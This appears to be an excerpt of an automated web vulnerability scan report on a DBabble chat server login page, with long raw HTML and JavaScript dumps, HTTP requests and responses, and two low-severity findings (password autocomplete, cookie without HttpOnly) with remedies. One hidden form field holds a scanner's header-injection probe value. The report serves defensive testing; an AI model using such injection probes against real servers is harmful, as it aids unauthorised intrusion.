FetchDate(); document.loginform.qfiller.value='_'+(new Date()).getTime(); return true;}function Login2(){ FetchDate(); window.name="mainframe" document.loginform.qfiller.value='_'+(new Date()).getTime(); document.loginform.submit();}function Login() { u=document.loginform.user.value; if (u=="") return; if (PassOK()==0) return; Login2();}function KeyCode(evt){ return document.all ? event.keyCode : evt.which ? evt.which : evt.keyCode ? evt.keyCode : evt.charcode;}function PassCheck(e) { if (KeyCode(e)==13) { Login(); return false; } else return true;}function UserCheck(e) { if (KeyCode(e)==13) { if (PassOK()==0) { document.loginform.pass.focus(); return false; } Login2(); return false; } else return true;}function Startup(){ if (window.top!=window && window.location!="/dbabble") { window.location="/dbabble?cmd=top_frame_error"; } window.name="login"}function GuestLogin(){ document.loginform.user.value="Invitado" document.loginform.pass.value=""; Login2();}function GuestLoginClearForm(){ document.loginform.new_window.value="" document.loginform.hide_menu_and_friends.value="" document.loginform.after_login_page.value="" document.loginform.after_logout_page.value="" document.loginform.override_dot_top.value="" document.loginform.override_main_name.value="" document.loginform.override_check_main_window.value="" document.loginform.target=""}function ClearFormSoon(){ setTimeout('GuestLoginClearForm()',2000)}function GuestLoginChatRoomInvite(gid,hide_menu_and_friends, invite_uid){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="3" pv="cmd=chat_list&gid="+gid if (invite_uid>0) { pv=pv+"&invite_hid=511&invite_uid="+invite_uid+"&invite_is_ugroup=0"; } document.loginform.after_login_page.value=pv; GuestLogin(); ClearFormSoon()}function GuestLoginChatRoom(gid,hide_menu_and_friends){ GuestLoginChatRoomInvite(gid,hide_menu_and_friends,0);}function GuestLoginDiscussion(gid,hide_menu_and_friends){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="2" document.loginform.after_login_page.value="cmd=group_items&gid="+gid; GuestLogin(); ClearFormSoon()}function GuestLoginNow(){ GuestLogin(); ClearFormSoon()}function GuestLoginTalkDo2(new_window,window_width, window_height, is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message, sub_frame_name, after_logout_page){ GuestLoginClearForm() txt="uid" if (is_ugroup) txt="ugid" document.loginform.after_logout_page.value=after_logout_page; if (new_window) { document.loginform.new_window.value="true" window.open("", "messageWindow", "width="+window_width+",height="+window_height+",resizable=yes") document.loginform.target="messageWindow" document.loginform.after_logout_page.value="javascript:window.close()" } if (sub_frame_name!="") { if (after_logout_page=="") { document.loginform.after_logout_page.value="blank.htm"; } document.loginform.override_dot_top.value=".top."+sub_frame_name document.loginform.override_main_name.value=sub_frame_name document.loginform.override_check_main_window.value="window.length>1 && window.top.frames[1].name=='"+sub_frame_name+"'" } if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="0" document.loginform.after_login_page.value="cmd=u_talk&hid=511&"+txt+"="+uid+"&talk_first_message="+escape(initial_message)+"&talk_other_first_message="+escape(other_initial_message)+"&talk_request_style="+talk_request_style+"&title_message="+escape(title_message)+"&leave_message="+escape(leave_message)+"&pick_first="+group_pick_first+"&heading_message="+escape(heading_message)+"&alt_message="+escape(alt_message);; document.loginform.window_title.value=title_message; setTimeout("GuestLoginNow()",250);}function GuestLoginTalkDo(new_window,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message){ GuestLoginTalkDo2(new_window,290,190,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message,"","")}function GuestLoginTalk(new_window, is_ugroup, uid,hide_menu_and_friends,initial_message){ other_initial_message="Hi, -NAME- here. How can I help you?" talk_request_style=1 // 0 = Send request to recipient as soon as clicking on the link // 1 = Send request as soon as you start typing // 2 = Send request as soon as you have finished typing a complete line GuestLoginTalkDo(new_window,is_ugroup,0,uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message,'','','','')}// --></script><title>DBabble conexi�n</title></head><body onload="Startup()" BACKGROUND="/img/whttxtr2.jpg"><LINK REL = "stylesheet" TYPE = "text/css" HREF = "/dbabble?cmd_get_js2=dbabble.css"><script language="JavaScript" src="/dbabble?cmd_get_js2=dbabble.js"></script><table bgcolor="black" width=100% border=0><tr> <td width=100% bgcolor="#336699" valign=center align=center><table border=0 cellpadding=0 cellspacing=0 margin=0><tr><td><img src="/img/netwin.gif" alt="Tra�do a usted por el software de NetWin Server - http://netwinsite.com" border=0</img></td><td><font class="huge_font" color="white">DBabble</font></td><td>&nbsp;&nbsp;&nbsp;</td><td><STYLE TYPE="text/css"><!-- A:VISITED.href_encode_class {color:white;} A:LINK.href_encode_class {color:white;}--></STYLE><font color="white">Tra�do a usted por el software de NetWin Server - <a class='href_encode_class' target='notvchat' href='http://netwinsite.com'>http://netwinsite.com</a></font></td></tr></table></td></tr></table><table><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">Lengua:</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=English&template=Standard"><font color="white">English</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><font color="white"><b>Espa�ol(Spanish)</b></font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Deutsch(German)&template=Standard"><font color="white">Deutsch(German)</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><br></tr></table><table><tr><td><font color="orange" style="font-size:12pt;"><b>DBabble para Windows</b></font>- Usted debe descargar e instalar el cliente de DBabble Windows 95/98/ME/2000/2003/NT/XP m�s bien que usar este Web page si es posible. Es mucho m�s r�pido y m�s f�cil utilizar. Usted puede descargarlo libremente de aqu�. <a href="/files/DBabble27y_Espa�ol(Spanish).exe" style="font-size:12pt;">Transferencia directa Versi�n 2.7y de DBabble</a>(1,947,161 bytes - debe tomar sobre 5 minutos sobre un m�dem 56K)</td></tr></table><script language="JavaScript"><!--CheckVersion() CheckBrowserVersion()//--></script><NOSCRIPT><b> Advertencia - DBabble requiere un web browser que apoye el Javascript 1,1 o m�s alto.<br>Su web browser no apoya Javascript o usted lo ha inhabilitado en sus preferencias.</b></NOSCRIPT><form style="margin:0" name="loginform" method="POST" target="_top" action="/dbabble"onSubmit="return SubmitCheck()"><table width=100%><tr><th colspan=2 align=left bgcolor=ivory>Nombre Y Contrase�a Del Usuario De la Conexi�n</th><th colspan=2" align=left bgcolor=ivory width=100%>Opciones De la Conexi�n</th></tr><tr><td><table><tr><td nowrap> Nombre de usuario</td><td><input type="text" name="user" value="" size="20" onkeypress="return UserCheck(event)"></td></tr><tr><td nowrap> Contrase�a</td><td> <input type="password" name="pass" value="" size="20" onkeypress="return PassCheck(event)"></td></tr></table></td><td align="LEFT"><input align="LEFT" type="submit" class=spbutton onmouseover="MO(event)" onmouseout="MU(event)" value="Iniciar sesi�n" alt="Iniciar sesi�n" name="Iniciar sesi�n"></td><td><table><tr><td nowrap><input type=hidden name="is_save_password" value="true"><input type=radio name="save_name" value="name">Excepto Nombre</td></tr><tr><td nowrap><input type=radio name="save_name" value="pass">Excepto nombre y contrase�a</td></tr><tr><td nowrap><input type=radio name="save_name" checked value="neither">Ni unos ni otros</td></tr></table></td><td><table><tr><td>Para simplificar el interfaz usted puede ocultar opcionalmente algunas caracter�sticas</td></tr><tr><td>Caracter�sticas:<select name="show_features"><option value="0" selected>Demuestre Todas las Caracter�sticas</option><option value="1" >Mensajes Inmediatos Solamente</option><option value="2" >Grupos de discusi�n solamente</option><option value="3" >Salas de charla solamente</option><option value="4" >Cuartos y discusiones de la charla solamente</option><option value="5" >Cuartos de la charla y mensajes inmediatos solamente</option><option value="6" >Discusiones y mensajes inmediatos solamente</option></select></td></tr></table></td></tr></table><input type="hidden" name="r_login" value="Login"><input type="hidden" name="u_day" value=""><input type="hidden" name="u_hour" value=""><input type="hidden" name="u_min" value=""><input type="hidden" name="u_sec" value=""><input type="hidden" name="qfiller" value=""><input type="hidden" name="window_title" value=""><input type="hidden" name="change_lang" value="Espa�ol(Spanish)"><input type="hidden" name="change_template" value="http://example.com/?
ns: netsparker056650=vuln"><input type="hidden" name="after_login_page" value=""><input type="hidden" name="hide_menu_and_friends" value=""><input type="hidden" name="after_logout_page" value=""><input type="hidden" name="override_dot_top" value=""><input type=hidden name="override_main_name" value=""><input type=hidden name="override_check_main_window" value=""><input type=hidden name="new_window" value="0"></form><script language="JavaScript"><!--document.loginform.user.focus();// --></script>Conexi�n justa usando su nombre y contrase�a normales del usuario del email<br><table width=100%><tr><th align=left bgcolor=ivory>Conexi�n De la Hu�sped</th></tr><tr><td>Usted puede alternativomente conexi�n como hu�sped. Las caracter�sticas de alg�n DBabble no est�n disponibles como hu�sped.</td></tr><tr><td><a href="javascript:GuestLogin()">Conexi�n de la hu�sped</a></td></tr></table><table width=100%><tr><th align=left bgcolor=ivory>Otras Conexiones</th></tr></table><a target='helpwin' href="/help/Espa�ol(Spanish)/Standard/contents.htm">Ayuda En l�nea de DBabble</a><br><a target='helpwin' href="/help/Espa�ol(Spanish)/Standard/password.htm">�Se olvid� de su contrase�a?</a><br><br>En este servidor tenemos 17 los usuarios registradosy los usuarios de 2 est�n actualmente en l�nea.Hay 1 sitio de la charlay hay 1 grupo de discusi�ncontener un total de art�culos de 306.<br><br>Usted puede utilizar DBabble con seguridad pero un directo m�s lento su web browser en <a href="https://netwin.co.nz:8133">https://netwin.co.nz:8133</a><hr>DBabble Linux versi�n del servidor de 2.7z (Aug 25 2004)- Servidor disponible para 340 d�as desde Dom, May 16 2010 4:44 pm<hr><font class=small_font>Powered by Netwin's <a href="http://netwinsite.com/dbabble/index.htm">DBabble secure chat, instant messaging and discussion server</a> software<table cellpadding="1" cellspacing="4"> <tr> <td class=small_font><b><a href="http://www.netwinsite.com">Netwin -- Server Software</a></b></font></td> <td class=small_font><a href="http://netwinsite.com/dnews.htm">DNews -- UseNet News Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/surgemail/index.htm">SurgeMail -- Mail Server Software</a></td> </tr> <tr> <td class=small_font><a href="http://netwinsite.com/webmail/index.htm">WebMail -- Web Mail Client</a></td> <td class=small_font><a href="http://netwinsite.com/surgeftp/index.htm">SurgeFTP -- Ftp Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/dbabble/index.htm">DBabble -- Chat Server, Instant Messaging, Discussions / Forums</a></td> </tr></table></font></body></html>
Auto Complete Enabled

Auto Complete Enabled
1 TOTAL
LOW
CONFIRMED
1
"Auto Complete" was enabled in one or more of the form fields. These were either "password" fields or important fields such as "Credit Card".

Impact

Data entered in these fields will be cached by the browser. An attacker who can access the victim's browser could steal this information. This is especially important if the application is commonly used in shared computers such as cyber cafes or airport terminals.

Remedy

Add the attribute autocomplete="off" to the form tag or to individual "input" fields.

Actions to Take

  1. See the remedy for the solution.
  2. Find all instances of inputs which store private data and disable autocomplete. Fields which contain data such as "Credit Card" or "CCV" type data should not be cached. You can allow the application to cache usernames and remember passwords, however, in most cases this is not recommended.
  3. Re-scan the application after addressing the identified issues to ensure that all of the fixes have been applied properly.

Required Skills for Successful Exploitation

Dumping all data from a browser can be fairly easy and there exist a number of automated tools to undertake this. Where the attacker cannot dump the data, he/she could still browse the recently visited websites and activate the auto-complete feature to see previously entered values.

External References

- /

/ CONFIRMED

http://smtp.netwin.co.nz:8132/

Identified Field Name

pass

Request

GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 14821
Connection: keep-alive
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:20 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html><head><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="cache-control" CONTENT="no-cache"><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:9pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;} .small_font {font-size:8pt;} .big_font {font-size:12pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript"><!--function CheckVersion(){ document.writeln("<b>Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.</b><br>"); document.writeln("<b>Your web browser only supports Javascript 1.0</b>");}function CheckBrowserVersion(){ ns4 = (document.layers)? true:false ns6 = (document.getElementById)? true:false ie4 = (document.all)? true:false if (!ns4 && !ie4 && !ns6) { document.writeln("<b>Warning - DBabble requires a more recent version of your web browser.</b><br>"); document.writeln("<b>For example Internet Explorer 4.0 or Netscape Navigator 4.0 or later.</b>"); }}// --></script><script language="JavaScript1.1"><!--function CheckVersion(){}// --></script><script language="JavaScript1.2"><!--function CheckVersion(){}// --></script><script language="JavaScript"><!--function FetchDate(){ x = new Date(); document.loginform.u_hour.value=x.getHours(); document.loginform.u_min.value=x.getMinutes(); document.loginform.u_sec.value=x.getSeconds(); document.loginform.u_day.value=x.getDate();}function PassOK(){ u=document.loginform.user.value; p=document.loginform.pass.value if (p=="") { txt="Guest".toLowerCase(); txt_len=txt.length; if (u.substring(0,txt_len).toLowerCase()!=txt) return 0; } return 1;}function SubmitCheck(){ u=document.loginform.user.value; if (u=="") { document.loginform.user.focus(); return false; } p=document.loginform.pass.value if (PassOK()==0) { document.loginform.pass.focus(); return false; } FetchDate(); document.loginform.qfiller.value='_'+(new Date()).getTime(); return true;}function Login2(){ FetchDate(); window.name="mainframe" document.loginform.qfiller.value='_'+(new Date()).getTime(); document.loginform.submit();}function Login() { u=document.loginform.user.value; if (u=="") return; if (PassOK()==0) return; Login2();}function KeyCode(evt){ return document.all ? event.keyCode : evt.which ? evt.which : evt.keyCode ? evt.keyCode : evt.charcode;}function PassCheck(e) { if (KeyCode(e)==13) { Login(); return false; } else return true;}function UserCheck(e) { if (KeyCode(e)==13) { if (PassOK()==0) { document.loginform.pass.focus(); return false; } Login2(); return false; } else return true;}function Startup(){ if (window.top!=window && window.location!="/dbabble") { window.location="/dbabble?cmd=top_frame_error"; } window.name="login"}function GuestLogin(){ document.loginform.user.value="Guest" document.loginform.pass.value=""; Login2();}function GuestLoginClearForm(){ document.loginform.new_window.value="" document.loginform.hide_menu_and_friends.value="" document.loginform.after_login_page.value="" document.loginform.after_logout_page.value="" document.loginform.override_dot_top.value="" document.loginform.override_main_name.value="" document.loginform.override_check_main_window.value="" document.loginform.target=""}function ClearFormSoon(){ setTimeout('GuestLoginClearForm()',2000)}function GuestLoginChatRoomInvite(gid,hide_menu_and_friends, invite_uid){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="3" pv="cmd=chat_list&gid="+gid if (invite_uid>0) { pv=pv+"&invite_hid=511&invite_uid="+invite_uid+"&invite_is_ugroup=0"; } document.loginform.after_login_page.value=pv; GuestLogin(); ClearFormSoon()}function GuestLoginChatRoom(gid,hide_menu_and_friends){ GuestLoginChatRoomInvite(gid,hide_menu_and_friends,0);}function GuestLoginDiscussion(gid,hide_menu_and_friends){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="2" document.loginform.after_login_page.value="cmd=group_items&gid="+gid; GuestLogin(); ClearFormSoon()}function GuestLoginNow(){ GuestLogin(); ClearFormSoon()}function GuestLoginTalkDo2(new_window,window_width, window_height, is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message, sub_frame_name, after_logout_page){ GuestLoginClearForm() txt="uid" if (is_ugroup) txt="ugid" document.loginform.after_logout_page.value=after_logout_page; if (new_window) { document.loginform.new_window.value="true" window.open("", "messageWindow", "width="+window_width+",height="+window_height+",resizable=yes") document.loginform.target="messageWindow" document.loginform.after_logout_page.value="javascript:window.close()" } if (sub_frame_name!="") { if (after_logout_page=="") { document.loginform.after_logout_page.value="blank.htm"; } document.loginform.override_dot_top.value=".top."+sub_frame_name document.loginform.override_main_name.value=sub_frame_name document.loginform.override_check_main_window.value="window.length>1 && window.top.frames[1].name=='"+sub_frame_name+"'" } if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="0" document.loginform.after_login_page.value="cmd=u_talk&hid=511&"+txt+"="+uid+"&talk_first_message="+escape(initial_message)+"&talk_other_first_message="+escape(other_initial_message)+"&talk_request_style="+talk_request_style+"&title_message="+escape(title_message)+"&leave_message="+escape(leave_message)+"&pick_first="+group_pick_first+"&heading_message="+escape(heading_message)+"&alt_message="+escape(alt_message);; document.loginform.window_title.value=title_message; setTimeout("GuestLoginNow()",250);}function GuestLoginTalkDo(new_window,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message){ GuestLoginTalkDo2(new_window,290,190,is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message,"","")}function GuestLoginTalk(new_window, is_ugroup, uid,hide_menu_and_friends,initial_message){ other_initial_message="Hi, -NAME- here. How can I help you?" talk_request_style=1 // 0 = Send request to recipient as soon as clicking on the link // 1 = Send request as soon as you start typing // 2 = Send request as soon as you have finished typing a complete line GuestLoginTalkDo(new_window,is_ugroup,0,uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message,'','','','')}// --></script><title>DBabble login</title></head><body onload="Startup()" BACKGROUND="/img/whttxtr2.jpg"><LINK REL = "stylesheet" TYPE = "text/css" HREF = "/dbabble?cmd_get_js2=dbabble.css"><script language="JavaScript" src="/dbabble?cmd_get_js2=dbabble.js"></script><table bgcolor="black" width=100% border=0><tr> <td width=100% bgcolor="#336699" valign=center align=center><table border=0 cellpadding=0 cellspacing=0 margin=0><tr><td><img src="/img/netwin.gif" alt="Brought to you by NetWin Server Software - http://netwinsite.com" border=0</img></td><td><font class="huge_font" color="white">DBabble</font></td><td>&nbsp;&nbsp;&nbsp;</td><td><STYLE TYPE="text/css"><!-- A:VISITED.href_encode_class {color:white;} A:LINK.href_encode_class {color:white;}--></STYLE><font color="white">Brought to you by NetWin Server Software - <a class='href_encode_class' target='notvchat' href='http://netwinsite.com'>http://netwinsite.com</a></font></td></tr></table></td></tr></table><table><table width="100%" cellpadding=0 cellspacing=1 border=0 bgcolor="black"><tr align=center><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="khaki"><font color="black">Language:</font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><font color="white"><b>English</b></font><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Espa�ol(Spanish)&template=Standard"><font color="white">Espa�ol(Spanish)</font></a><spacer type="block" width=10px></td><td nowrap height=20 border=1 align=center style="padding-right:10px;padding-left:10px;" bgcolor="steelblue"><a href="/dbabble?lang=Deutsch(German)&template=Standard"><font color="white">Deutsch(German)</font></a><spacer type="block" width=10px></td><td bgcolor="steelblue" width="100%">&nbsp;</td></tr></table><br></tr></table><table><tr><td><font color="orange" style="font-size:12pt;"><b>DBabble for Windows</b></font>- You should download and install the DBabble Windows 95/98/ME/2000/2003/NT/XP client rather than using this web page if possible. It is much faster and easier to use. You can download it free from here. <a href="/files/DBabble27y_English.exe" style="font-size:12pt;">Download DBabble Version 2.7y</a>(1,901,847 bytes - should take about 5 minutes over a 56K modem)</td></tr></table><script language="JavaScript"><!--CheckVersion() CheckBrowserVersion()//--></script><NOSCRIPT><b> Warning - DBabble requires a web browser that Supports JavaScript 1.1 or higher.<br>Your web browser does not support Javascript or you have disabled it in your preferences.</b></NOSCRIPT><form style="margin:0" name="loginform" method="POST" target="_top" action="/dbabble"onSubmit="return SubmitCheck()"><table width=100%><tr><th colspan=2 align=left bgcolor=ivory>Login User Name & Password</th><th colspan=2" align=left bgcolor=ivory width=100%>Login Options</th></tr><tr><td><table><tr><td nowrap> User Name</td><td><input type="text" name="user" value="" size="20" onkeypress="return UserCheck(event)"></td></tr><tr><td nowrap> Password</td><td> <input type="password" name="pass" value="" size="20" onkeypress="return PassCheck(event)"></td></tr></table></td><td align="LEFT"><input align="LEFT" type="submit" class=spbutton onmouseover="MO(event)" onmouseout="MU(event)" value="Login" alt="Login" name="Login"></td><td><table><tr><td nowrap><input type=hidden name="is_save_password" value="true"><input type=radio name="save_name" value="name">Save Name</td></tr><tr><td nowrap><input type=radio name="save_name" value="pass">Save Name and Password</td></tr><tr><td nowrap><input type=radio name="save_name" checked value="neither">Neither</td></tr></table></td><td><table><tr><td>To simplify the interface you can optionally hide some features</td></tr><tr><td>Features:<select name="show_features"><option value="0" selected>Show All Features</option><option value="1" >Instant Messages Only</option><option value="2" >Forums Only</option><option value="3" >Chat Rooms Only</option><option value="4" >Chat Rooms and Forums Only</option><option value="5" >Chat Rooms and Instant Messages Only</option><option value="6" >Forums and Instant Messages Only</option></select></td></tr></table></td></tr></table><input type="hidden" name="r_login" value="Login"><input type="hidden" name="u_day" value=""><input type="hidden" name="u_hour" value=""><input type="hidden" name="u_min" value=""><input type="hidden" name="u_sec" value=""><input type="hidden" name="qfiller" value=""><input type="hidden" name="window_title" value=""><input type="hidden" name="change_lang" value=""><input type="hidden" name="change_template" value=""><input type="hidden" name="after_login_page" value=""><input type="hidden" name="hide_menu_and_friends" value=""><input type="hidden" name="after_logout_page" value=""><input type="hidden" name="override_dot_top" value=""><input type=hidden name="override_main_name" value=""><input type=hidden name="override_check_main_window" value=""><input type=hidden name="new_window" value="0"></form><script language="JavaScript"><!--document.loginform.user.focus();// --></script>Just login using your normal Email user name and password<br><table width=100%><tr><th align=left bgcolor=ivory>Guest Login</th></tr><tr><td>Alternatively you can login as a guest. Some DBabble features are not available as a guest.</td></tr><tr><td><a href="javascript:GuestLogin()">Guest login</a></td></tr></table><table width=100%><tr><th align=left bgcolor=ivory>Other Links</th></tr></table><a target='helpwin' href="/help/English/Standard/contents.htm">DBabble Online Help</a><br><a target='helpwin' href="/help/English/Standard/password.htm">Forgot your Password?</a><br><br>On this server we have 17 registered usersand 2 users are currently online.There is 1 chat roomand there is 1 forumcontaining a total of 306 articles.<br><br>You can use DBabble securely but slower through your web browser at <a href="https://netwin.co.nz:8133">https://netwin.co.nz:8133</a><hr>DBabble Linux Server Version 2.7z (Aug 25 2004)- Server up for 340 days since Sun, May 16 2010 4:44 pm<hr><font class=small_font>Powered by Netwin's <a href="http://netwinsite.com/dbabble/index.htm">DBabble secure chat, instant messaging and discussion server</a> software<table cellpadding="1" cellspacing="4"> <tr> <td class=small_font><b><a href="http://www.netwinsite.com">Netwin -- Server Software</a></b></font></td> <td class=small_font><a href="http://netwinsite.com/dnews.htm">DNews -- UseNet News Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/surgemail/index.htm">SurgeMail -- Mail Server Software</a></td> </tr> <tr> <td class=small_font><a href="http://netwinsite.com/webmail/index.htm">WebMail -- Web Mail Client</a></td> <td class=small_font><a href="http://netwinsite.com/surgeftp/index.htm">SurgeFTP -- Ftp Server Software</a></td> <td class=small_font><a href="http://netwinsite.com/dbabble/index.htm">DBabble -- Chat Server, Instant Messaging, Discussions / Forums</a></td> </tr></table></font></body></html>
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly
1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /dbabble

/dbabble CONFIRMED

http://smtp.netwin.co.nz:8132/dbabble?lang=Espa%EF%BF%BDol(Spanish)&template=Standard

Identified Cookie

TEMPLATE

Request

GET /dbabble?lang=Espa%EF%BF%BDol(Spanish)&template=Standard HTTP/1.1
Referer: http://smtp.netwin.co.nz:8132/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: smtp.netwin.co.nz:8132
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: DBabble 2.7z
Content-Length: 15306
Connection: close
Set-Cookie: TEMPLATE=Standard; path=/; expires=Sat, 21 Apr 2012 00:22:20 GMT,LANG=Espa�ol(Spanish); path=/; expires=Sat, 21 Apr 2012 00:22:20 GMT
MIME-version: 1.0
Date: Fri, 22 Apr 2011 00:22:20 GMT
Pragma: no-cache
Cache-control: no-cache
Content-Type: text/html


<html><head><META HTTP-EQUIV="Pragma" CONTENT="no-cache"><META HTTP-EQUIV="cache-control" CONTENT="no-cache"><STYLE TYPE="text/css"><!-- BODY {font-size:10pt;} TD {font-size:10pt;} INPUT {font-size:9pt;} SELECT {font-size:9pt;} TEXTAREA {font-size:10pt;} TH {font-size:10pt;} FONT {font-size:10pt;} .small_font {font-size:8pt;} .big_font {font-size:12pt;}--></STYLE><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><script language="JavaScript"><!--function CheckVersion(){ document.writeln("<b>Advertencia - DBabble requiere un web browser que apoye el Javascript 1,1 o m�s alto.</b><br>"); document.writeln("<b>Your web browser only supports Javascript 1.0</b>");}function CheckBrowserVersion(){ ns4 = (document.layers)? true:false ns6 = (document.getElementById)? true:false ie4 = (document.all)? true:false if (!ns4 && !ie4 && !ns6) { document.writeln("<b>Warning - DBabble requires a more recent version of your web browser.</b><br>"); document.writeln("<b>For example Internet Explorer 4.0 or Netscape Navigator 4.0 or later.</b>"); }}// --></script><script language="JavaScript1.1"><!--function CheckVersion(){}// --></script><script language="JavaScript1.2"><!--function CheckVersion(){}// --></script><script language="JavaScript"><!--function FetchDate(){ x = new Date(); document.loginform.u_hour.value=x.getHours(); document.loginform.u_min.value=x.getMinutes(); document.loginform.u_sec.value=x.getSeconds(); document.loginform.u_day.value=x.getDate();}function PassOK(){ u=document.loginform.user.value; p=document.loginform.pass.value if (p=="") { txt="Invitado".toLowerCase(); txt_len=txt.length; if (u.substring(0,txt_len).toLowerCase()!=txt) return 0; } return 1;}function SubmitCheck(){ u=document.loginform.user.value; if (u=="") { document.loginform.user.focus(); return false; } p=document.loginform.pass.value if (PassOK()==0) { document.loginform.pass.focus(); return false; } FetchDate(); document.loginform.qfiller.value='_'+(new Date()).getTime(); return true;}function Login2(){ FetchDate(); window.name="mainframe" document.loginform.qfiller.value='_'+(new Date()).getTime(); document.loginform.submit();}function Login() { u=document.loginform.user.value; if (u=="") return; if (PassOK()==0) return; Login2();}function KeyCode(evt){ return document.all ? event.keyCode : evt.which ? evt.which : evt.keyCode ? evt.keyCode : evt.charcode;}function PassCheck(e) { if (KeyCode(e)==13) { Login(); return false; } else return true;}function UserCheck(e) { if (KeyCode(e)==13) { if (PassOK()==0) { document.loginform.pass.focus(); return false; } Login2(); return false; } else return true;}function Startup(){ if (window.top!=window && window.location!="/dbabble") { window.location="/dbabble?cmd=top_frame_error"; } window.name="login"}function GuestLogin(){ document.loginform.user.value="Invitado" document.loginform.pass.value=""; Login2();}function GuestLoginClearForm(){ document.loginform.new_window.value="" document.loginform.hide_menu_and_friends.value="" document.loginform.after_login_page.value="" document.loginform.after_logout_page.value="" document.loginform.override_dot_top.value="" document.loginform.override_main_name.value="" document.loginform.override_check_main_window.value="" document.loginform.target=""}function ClearFormSoon(){ setTimeout('GuestLoginClearForm()',2000)}function GuestLoginChatRoomInvite(gid,hide_menu_and_friends, invite_uid){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="3" pv="cmd=chat_list&gid="+gid if (invite_uid>0) { pv=pv+"&invite_hid=511&invite_uid="+invite_uid+"&invite_is_ugroup=0"; } document.loginform.after_login_page.value=pv; GuestLogin(); ClearFormSoon()}function GuestLoginChatRoom(gid,hide_menu_and_friends){ GuestLoginChatRoomInvite(gid,hide_menu_and_friends,0);}function GuestLoginDiscussion(gid,hide_menu_and_friends){ GuestLoginClearForm() if (hide_menu_and_friends) document.loginform.hide_menu_and_friends.value="true" document.loginform.show_features.value="2" document.loginform.after_login_page.value="cmd=group_items&gid="+gid; GuestLogin(); ClearFormSoon()}function GuestLoginNow(){ GuestLogin(); ClearFormSoon()}function GuestLoginTalkDo2(new_window,window_width, window_height, is_ugroup, group_pick_first, uid,hide_menu_and_friends,talk_request_style,initial_message,other_initial_message, title_message, heading_message, alt_message, leave_message, sub_frame_name, after_logout_page){ GuestLoginClearForm() txt="uid" if (is_ugroup) txt="ugid" document.loginform.after_logout_page.value=after_logout_page; if (new_window) { document.loginform.new_window.value="true" window.open("", 